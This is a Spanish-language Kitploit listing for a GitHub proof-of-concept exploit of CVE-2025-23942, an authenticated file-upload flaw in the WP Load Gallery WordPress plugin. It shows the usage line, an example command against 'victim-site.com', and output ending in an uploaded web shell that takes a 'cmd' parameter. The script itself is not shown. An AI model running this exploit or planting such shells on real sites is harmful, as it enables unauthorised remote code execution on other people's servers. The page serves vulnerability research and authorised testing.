Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - Autenticado (Author+) Subida Arbitraria de Archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-23942-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - Autenticado (Author+) Subida Arbitraria de Archivos

Ver Repositorio
32hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de WP Load Gallery (CVE-2025-23942)

📌 Descripción

La vulnerabilidad de carga sin restricciones de archivos de tipo peligroso en NgocCode WP Load Gallery permite cargar un Web Shell a un servidor web. Este problema afecta a WP Load Gallery: desde n/a hasta 2.1.6.

⚠️ Detalles de la vulnerabilidad

  • CVE ID: CVE-2025-23942
  • Plugin afectado: WP Load Gallery
  • Versiones afectadas: Hasta 2.1.6
  • Tipo de vulnerabilidad: Carga de archivos sin restricciones
  • Gravedad: Crítica (9.1 CVSS)
  • Vector de ataque: Ejecución remota de código (RCE) autenticada (Author+)
  • Parche disponible: ❌ (Aún no hay parche oficial)

🚀 Características del Exploit

✅ Explotación automatizada – Extrae el nonce, inicia sesión y sube el shell automáticamente.
✅ Comprobación de versión – Confirma si el objetivo es vulnerable antes de la explotación.
✅ Manejo de errores – Garantiza una ejecución fluida incluso en caso de fallos.
✅ Manejo de sesiones – Utiliza una gestión de sesiones persistente para la autenticación. ✅ – Proporciona salida en cada paso.


Retroalimentación en tiempo real

🛠️ Requisitos

  • Python 3.x
  • Módulo requests (pip install requests)
  • Una cuenta WordPress Author+ válida en el sistema objetivo

🔥 Uso

Ejecute el script con los parámetros necesarios:

root@kitploit:~
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

Ejemplo:

root@kitploit:~
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 Ejemplo de salida

root@kitploit:~
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 Descargo de responsabilidad

Este exploit está destinado únicamente a fines educativos y de investigación en seguridad. No lo utilice en sistemas que no le pertenezcan o para los que no tenga permiso explícito de prueba. El autor no es responsable del mal uso de este script. ( Khaled_alenazi )

Descargar herramienta